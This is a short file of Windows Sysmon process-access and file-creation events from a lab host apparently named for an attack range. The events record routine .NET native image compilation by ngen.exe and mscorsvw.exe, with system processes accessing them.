{"EventTime":"2020-08-01 05:58:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6606,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:17.183\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0479-5F25-0000-00109C910C00}\r\nTargetProcessId: 3464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:17.183","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0479-5F25-0000-00109C910C00}","TargetProcessId":"3464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6607,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:17.183\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0479-5F25-0000-00109C910C00}\r\nTargetProcessId: 3464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:17.183","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0479-5F25-0000-00109C910C00}","TargetProcessId":"3464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6608,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:17.198\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0479-5F25-0000-00109C910C00}\r\nTargetProcessId: 3464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:17.198","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0479-5F25-0000-00109C910C00}","TargetProcessId":"3464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6609,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:18.214\r\nProcessGuid: {A837DB8D-0479-5F25-0000-00109C910C00}\r\nProcessId: 3464\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d88-0\\Microsoft.GroupPolicy.Targeting.dll\r\nCreationUtcTime: 2020-08-01 05:58:18.214","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:18.214","ProcessGuid":"{A837DB8D-0479-5F25-0000-00109C910C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d88-0\\Microsoft.GroupPolicy.Targeting.dll","CreationUtcTime":"2020-08-01 05:58:18.214","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6610,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.261\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-001094950C00}\r\nTargetProcessId: 892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.261","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-001094950C00}","TargetProcessId":"892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6611,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.261\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-001094950C00}\r\nTargetProcessId: 892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.261","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-001094950C00}","TargetProcessId":"892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6612,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.261\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-001094950C00}\r\nTargetProcessId: 892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.261","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-001094950C00}","TargetProcessId":"892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6613,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.292\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-00101D990C00}\r\nTargetProcessId: 4780\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.292","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-00101D990C00}","TargetProcessId":"4780","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6614,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.292\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-00101D990C00}\r\nTargetProcessId: 4780\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.292","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-00101D990C00}","TargetProcessId":"4780","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
